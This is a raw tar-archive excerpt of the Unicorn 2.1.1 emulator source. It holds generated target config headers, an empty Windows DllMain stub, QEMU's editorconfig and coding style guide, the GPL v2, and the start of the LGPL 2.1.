TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/tricore-softmmu/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017313�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/tricore-softmmu/config-target.h��������������������������������������������������0000664�0000000�0000000�00000000250�14675241067�0022212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_TRICORE 1 #define TARGET_NAME "tricore" #define TARGET_TRICORE 1 #define CONFIG_SOFTMMU 1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/unicorn/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015631�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/unicorn/dllmain.cpp��������������������������������������������������������������0000664�0000000�0000000�00000000506�14675241067�0017756�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/x86_64-softmmu/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016602�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/x86_64-softmmu/config-target.h���������������������������������������������������0000664�0000000�0000000�00000000243�14675241067�0021503�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_X86_64 1 #define TARGET_NAME "x86_64" #define TARGET_I386 1 #define CONFIG_SOFTMMU 1 �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/���������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014153�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/.editorconfig��������������������������������������������������������������������0000664�0000000�0000000�00000001354�14675241067�0016633�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# EditorConfig is a file format and collection of text editor plugins # for maintaining consistent coding styles between different editors # and IDEs. Most popular editors support this either natively or via # plugin. # # Check https://editorconfig.org for details. root = true [*] end_of_line = lf insert_final_newline = true charset = utf-8 [*.mak] indent_style = tab indent_size = 8 file_type_emacs = makefile [Makefile*] indent_style = tab indent_size = 8 file_type_emacs = makefile [*.{c,h}] indent_style = space indent_size = 4 [*.sh] indent_style = space indent_size = 4 [*.{s,S}] indent_style = tab indent_size = 8 file_type_emacs = asm [*.{vert,frag}] file_type_emacs = glsl [*.json] indent_style = space file_type_emacs = python ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/CODING_STYLE.rst�����������������������������������������������������������������0000664�0000000�0000000�00000052016�14675241067�0016634�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������================= QEMU Coding Style ================= .. contents:: Table of Contents Please use the script checkpatch.pl in the scripts directory to check patches before submitting. Formatting and style ******************** Whitespace ========== Of course, the most important aspect in any coding style is whitespace. Crusty old coders who have trouble spotting the glasses on their noses can tell the difference between a tab and eight spaces from a distance of approximately fifteen parsecs. Many a flamewar has been fought and lost on this issue. QEMU indents are four spaces. Tabs are never used, except in Makefiles where they have been irreversibly coded into the syntax. Spaces of course are superior to tabs because: * You have just one way to specify whitespace, not two. Ambiguity breeds mistakes. * The confusion surrounding 'use tabs to indent, spaces to justify' is gone. * Tab indents push your code to the right, making your screen seriously unbalanced. * Tabs will be rendered incorrectly on editors who are misconfigured not to use tab stops of eight positions. * Tabs are rendered badly in patches, causing off-by-one errors in almost every line. * It is the QEMU coding style. Do not leave whitespace dangling off the ends of lines. Multiline Indent ---------------- There are several places where indent is necessary: * if/else * while/for * function definition & call When breaking up a long line to fit within line width, we need a proper indent for the following lines. In case of if/else, while/for, align the secondary lines just after the opening parenthesis of the first. For example: .. code-block:: c if (a == 1 && b == 2) { while (a == 1 && b == 2) { In case of function, there are several variants: * 4 spaces indent from the beginning * align the secondary lines just after the opening parenthesis of the first For example: .. code-block:: c do_something(x, y, z); do_something(x, y, z); do_something(x, do_another(y, z)); Line width ========== Lines should be 80 characters; try not to make them longer. Sometimes it is hard to do, especially when dealing with QEMU subsystems that use long function or symbol names. Even in that case, do not make lines much longer than 80 characters. Rationale: * Some people like to tile their 24" screens with a 6x4 matrix of 80x24 xterms and use vi in all of them. The best way to punish them is to let them keep doing it. * Code and especially patches is much more readable if limited to a sane line length. Eighty is traditional. * The four-space indentation makes the most common excuse ("But look at all that white space on the left!") moot. * It is the QEMU coding style. Naming ====== Variables are lower_case_with_underscores; easy to type and read. Structured type names are in CamelCase; harder to type but standing out. Enum type names and function type names should also be in CamelCase. Scalar type names are lower_case_with_underscores_ending_with_a_t, like the POSIX uint64_t and family. Note that this last convention contradicts POSIX and is therefore likely to be changed. When wrapping standard library functions, use the prefix ``qemu_`` to alert readers that they are seeing a wrapped version; otherwise avoid this prefix. Block structure =============== Every indented statement is braced; even if the block contains just one statement. The opening brace is on the line that contains the control flow statement that introduces the new block; the closing brace is on the same line as the else keyword, or on a line by itself if there is no else keyword. Example: .. code-block:: c if (a == 5) { printf("a was 5.\n"); } else if (a == 6) { printf("a was 6.\n"); } else { printf("a was something else entirely.\n"); } Note that 'else if' is considered a single statement; otherwise a long if/ else if/else if/.../else sequence would need an indent for every else statement. An exception is the opening brace for a function; for reasons of tradition and clarity it comes on a line by itself: .. code-block:: c void a_function(void) { do_something(); } Rationale: a consistent (except for functions...) bracing style reduces ambiguity and avoids needless churn when lines are added or removed. Furthermore, it is the QEMU coding style. Declarations ============ Mixed declarations (interleaving statements and declarations within blocks) are generally not allowed; declarations should be at the beginning of blocks. Every now and then, an exception is made for declarations inside a #ifdef or #ifndef block: if the code looks nicer, such declarations can be placed at the top of the block even if there are statements above. On the other hand, however, it's often best to move that #ifdef/#ifndef block to a separate function altogether. Conditional statements ====================== When comparing a variable for (in)equality with a constant, list the constant on the right, as in: .. code-block:: c if (a == 1) { /* Reads like: "If a equals 1" */ do_something(); } Rationale: Yoda conditions (as in 'if (1 == a)') are awkward to read. Besides, good compilers already warn users when '==' is mis-typed as '=', even when the constant is on the right. Comment style ============= We use traditional C-style /``*`` ``*``/ comments and avoid // comments. Rationale: The // form is valid in C99, so this is purely a matter of consistency of style. The checkpatch script will warn you about this. Multiline comment blocks should have a row of stars on the left, and the initial /``*`` and terminating ``*``/ both on their own lines: .. code-block:: c /* * like * this */ This is the same format required by the Linux kernel coding style. (Some of the existing comments in the codebase use the GNU Coding Standards form which does not have stars on the left, or other variations; avoid these when writing new comments, but don't worry about converting to the preferred form unless you're editing that comment anyway.) Rationale: Consistency, and ease of visually picking out a multiline comment from the surrounding code. Language usage ************** Preprocessor ============ Variadic macros --------------- For variadic macros, stick with this C99-like syntax: .. code-block:: c #define DPRINTF(fmt, ...) \ do { printf("IRQ: " fmt, ## __VA_ARGS__); } while (0) Include directives ------------------ Order include directives as follows: .. code-block:: c #include "qemu/osdep.h" /* Always first... */ #include <...> /* then system headers... */ #include "..." /* and finally QEMU headers. */ The "qemu/osdep.h" header contains preprocessor macros that affect the behavior of core system headers like <stdint.h>. It must be the first include so that core system headers included by external libraries get the preprocessor macros that QEMU depends on. Do not include "qemu/osdep.h" from header files since the .c file will have already included it. C types ======= It should be common sense to use the right type, but we have collected a few useful guidelines here. Scalars ------- If you're using "int" or "long", odds are good that there's a better type. If a variable is counting something, it should be declared with an unsigned type. If it's host memory-size related, size_t should be a good choice (use ssize_t only if required). Guest RAM memory offsets must use ram_addr_t, but only for RAM, it may not cover whole guest address space. If it's file-size related, use off_t. If it's file-offset related (i.e., signed), use off_t. If it's just counting small numbers use "unsigned int"; (on all but oddball embedded systems, you can assume that that type is at least four bytes wide). In the event that you require a specific width, use a standard type like int32_t, uint32_t, uint64_t, etc. The specific types are mandatory for VMState fields. Don't use Linux kernel internal types like u32, __u32 or __le32. Use hwaddr for guest physical addresses except pcibus_t for PCI addresses. In addition, ram_addr_t is a QEMU internal address space that maps guest RAM physical addresses into an intermediate address space that can map to host virtual address spaces. Generally speaking, the size of guest memory can always fit into ram_addr_t but it would not be correct to store an actual guest physical address in a ram_addr_t. For CPU virtual addresses there are several possible types. vaddr is the best type to use to hold a CPU virtual address in target-independent code. It is guaranteed to be large enough to hold a virtual address for any target, and it does not change size from target to target. It is always unsigned. target_ulong is a type the size of a virtual address on the CPU; this means it may be 32 or 64 bits depending on which target is being built. It should therefore be used only in target-specific code, and in some performance-critical built-per-target core code such as the TLB code. There is also a signed version, target_long. abi_ulong is for the ``*``-user targets, and represents a type the size of 'void ``*``' in that target's ABI. (This may not be the same as the size of a full CPU virtual address in the case of target ABIs which use 32 bit pointers on 64 bit CPUs, like sparc32plus.) Definitions of structures that must match the target's ABI must use this type for anything that on the target is defined to be an 'unsigned long' or a pointer type. There is also a signed version, abi_long. Of course, take all of the above with a grain of salt. If you're about to use some system interface that requires a type like size_t, pid_t or off_t, use matching types for any corresponding variables. Also, if you try to use e.g., "unsigned int" as a type, and that conflicts with the signedness of a related variable, sometimes it's best just to use the *wrong* type, if "pulling the thread" and fixing all related variables would be too invasive. Finally, while using descriptive types is important, be careful not to go overboard. If whatever you're doing causes warnings, or requires casts, then reconsider or ask for help. Pointers -------- Ensure that all of your pointers are "const-correct". Unless a pointer is used to modify the pointed-to storage, give it the "const" attribute. That way, the reader knows up-front that this is a read-only pointer. Perhaps more importantly, if we're diligent about this, when you see a non-const pointer, you're guaranteed that it is used to modify the storage it points to, or it is aliased to another pointer that is. Typedefs -------- Typedefs are used to eliminate the redundant 'struct' keyword, since type names have a different style than other identifiers ("CamelCase" versus "snake_case"). Each named struct type should have a CamelCase name and a corresponding typedef. Since certain C compilers choke on duplicated typedefs, you should avoid them and declare a typedef only in one header file. For common types, you can use "include/qemu/typedefs.h" for example. However, as a matter of convenience it is also perfectly fine to use forward struct definitions instead of typedefs in headers and function prototypes; this avoids problems with duplicated typedefs and reduces the need to include headers from other headers. Reserved namespaces in C and POSIX ---------------------------------- Underscore capital, double underscore, and underscore 't' suffixes should be avoided. Low level memory management =========================== Use of the malloc/free/realloc/calloc/valloc/memalign/posix_memalign APIs is not allowed in the QEMU codebase. Instead of these routines, use the GLib memory allocation routines g_malloc/g_malloc0/g_new/ g_new0/g_realloc/g_free or QEMU's qemu_memalign/qemu_blockalign/qemu_vfree APIs. Please note that g_malloc will exit on allocation failure, so there is no need to test for failure (as you would have to with malloc). Calling g_malloc with a zero size is valid and will return NULL. Prefer g_new(T, n) instead of g_malloc(sizeof(T) ``*`` n) for the following reasons: * It catches multiplication overflowing size_t; * It returns T ``*`` instead of void ``*``, letting compiler catch more type errors. Declarations like .. code-block:: c T *v = g_malloc(sizeof(*v)) are acceptable, though. Memory allocated by qemu_memalign or qemu_blockalign must be freed with qemu_vfree, since breaking this will cause problems on Win32. String manipulation =================== Do not use the strncpy function. As mentioned in the man page, it does *not* guarantee a NULL-terminated buffer, which makes it extremely dangerous to use. It also zeros trailing destination bytes out to the specified length. Instead, use this similar function when possible, but note its different signature: .. code-block:: c void pstrcpy(char *dest, int dest_buf_size, const char *src) Don't use strcat because it can't check for buffer overflows, but: .. code-block:: c char *pstrcat(char *buf, int buf_size, const char *s) The same limitation exists with sprintf and vsprintf, so use snprintf and vsnprintf. QEMU provides other useful string functions: .. code-block:: c int strstart(const char *str, const char *val, const char **ptr) int stristart(const char *str, const char *val, const char **ptr) int qemu_strnlen(const char *s, int max_len) There are also replacement character processing macros for isxyz and toxyz, so instead of e.g. isalnum you should use qemu_isalnum. Because of the memory management rules, you must use g_strdup/g_strndup instead of plain strdup/strndup. Printf-style functions ====================== Whenever you add a new printf-style function, i.e., one with a format string argument and following "..." in its prototype, be sure to use gcc's printf attribute directive in the prototype. This makes it so gcc's -Wformat and -Wformat-security options can do their jobs and cross-check format strings with the number and types of arguments. C standard, implementation defined and undefined behaviors ========================================================== C code in QEMU should be written to the C99 language specification. A copy of the final version of the C99 standard with corrigenda TC1, TC2, and TC3 included, formatted as a draft, can be downloaded from: `<http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf>`_ The C language specification defines regions of undefined behavior and implementation defined behavior (to give compiler authors enough leeway to produce better code). In general, code in QEMU should follow the language specification and avoid both undefined and implementation defined constructs. ("It works fine on the gcc I tested it with" is not a valid argument...) However there are a few areas where we allow ourselves to assume certain behaviors because in practice all the platforms we care about behave in the same way and writing strictly conformant code would be painful. These are: * you may assume that integers are 2s complement representation * you may assume that right shift of a signed integer duplicates the sign bit (ie it is an arithmetic shift, not a logical shift) In addition, QEMU assumes that the compiler does not use the latitude given in C99 and C11 to treat aspects of signed '<<' as undefined, as documented in the GNU Compiler Collection manual starting at version 4.0. Automatic memory deallocation ============================= QEMU has a mandatory dependency either the GCC or CLang compiler. As such it has the freedom to make use of a C language extension for automatically running a cleanup function when a stack variable goes out of scope. This can be used to simplify function cleanup paths, often allowing many goto jumps to be eliminated, through automatic free'ing of memory. The GLib2 library provides a number of functions/macros for enabling automatic cleanup: `<https://developer.gnome.org/glib/stable/glib-Miscellaneous-Macros.html>`_ Most notably: * g_autofree - will invoke g_free() on the variable going out of scope * g_autoptr - for structs / objects, will invoke the cleanup func created by a previous use of G_DEFINE_AUTOPTR_CLEANUP_FUNC. This is supported for most GLib data types and GObjects For example, instead of .. code-block:: c int somefunc(void) { int ret = -1; char *foo = g_strdup_printf("foo%", "wibble"); GList *bar = ..... if (eek) { goto cleanup; } ret = 0; cleanup: g_free(foo); g_list_free(bar); return ret; } Using g_autofree/g_autoptr enables the code to be written as: .. code-block:: c int somefunc(void) { g_autofree char *foo = g_strdup_printf("foo%", "wibble"); g_autoptr (GList) bar = ..... if (eek) { return -1; } return 0; } While this generally results in simpler, less leak-prone code, there are still some caveats to beware of * Variables declared with g_auto* MUST always be initialized, otherwise the cleanup function will use uninitialized stack memory * If a variable declared with g_auto* holds a value which must live beyond the life of the function, that value must be saved and the original variable NULL'd out. This can be simpler using g_steal_pointer .. code-block:: c char *somefunc(void) { g_autofree char *foo = g_strdup_printf("foo%", "wibble"); g_autoptr (GList) bar = ..... if (eek) { return NULL; } return g_steal_pointer(&foo); } QEMU Specific Idioms ******************** Error handling and reporting ============================ Reporting errors to the human user ---------------------------------- Do not use printf(), fprintf() or monitor_printf(). Instead, use error_report() or error_vreport() from error-report.h. This ensures the error is reported in the right place (current monitor or stderr), and in a uniform format. Use error_printf() & friends to print additional information. error_report() prints the current location. In certain common cases like command line parsing, the current location is tracked automatically. To manipulate it manually, use the loc_``*``() from error-report.h. Propagating errors ------------------ An error can't always be reported to the user right where it's detected, but often needs to be propagated up the call chain to a place that can handle it. This can be done in various ways. The most flexible one is Error objects. See error.h for usage information. Use the simplest suitable method to communicate success / failure to callers. Stick to common methods: non-negative on success / -1 on error, non-negative / -errno, non-null / null, or Error objects. Example: when a function returns a non-null pointer on success, and it can fail only in one way (as far as the caller is concerned), returning null on failure is just fine, and certainly simpler and a lot easier on the eyes than propagating an Error object through an Error ``*````*`` parameter. Example: when a function's callers need to report details on failure only the function really knows, use Error ``*````*``, and set suitable errors. Do not report an error to the user when you're also returning an error for somebody else to handle. Leave the reporting to the place that consumes the error returned. Handling errors --------------- Calling exit() is fine when handling configuration errors during startup. It's problematic during normal operation. In particular, monitor commands should never exit(). Do not call exit() or abort() to handle an error that can be triggered by the guest (e.g., some unimplemented corner case in guest code translation or device emulation). Guests should not be able to terminate QEMU. Note that &error_fatal is just another way to exit(1), and &error_abort is just another way to abort(). trace-events style ================== 0x prefix --------- In trace-events files, use a '0x' prefix to specify hex numbers, as in: .. code-block:: some_trace(unsigned x, uint64_t y) "x 0x%x y 0x" PRIx64 An exception is made for groups of numbers that are hexadecimal by convention and separated by the symbols '.', '/', ':', or ' ' (such as PCI bus id): .. code-block:: another_trace(int cssid, int ssid, int dev_num) "bus id: %x.%x.%04x" However, you can use '0x' for such groups if you want. Anyway, be sure that it is obvious that numbers are in hex, ex.: .. code-block:: data_dump(uint8_t c1, uint8_t c2, uint8_t c3) "bytes (in hex): %02x %02x %02x" Rationale: hex numbers are hard to read in logs when there is no 0x prefix, especially when (occasionally) the representation doesn't contain any letters and especially in one line with other decimal numbers. Number groups are allowed to not use '0x' because for some things notations like %x.%x.%x are used not only in Qemu. Also dumping raw data bytes with '0x' is less readable. '#' printf flag --------------- Do not use printf flag '#', like '%#x'. Rationale: there are two ways to add a '0x' prefix to printed number: '0x%...' and '%#...'. For consistency the only one way should be used. Arguments for '0x%' are: * it is more popular * '%#' omits the 0x for the value 0 which makes output inconsistent ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/COPYING��������������������������������������������������������������������������0000664�0000000�0000000�00000043110�14675241067�0015205�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/COPYING.LIB����������������������������������������������������������������������0000664�0000000�0000000�00000063642�14675241067�0015626�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ GNU LESSER GENERAL PUBLIC LICENSE Version 2.1, February 1999 Copyright (C) 1991, 1999 Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but 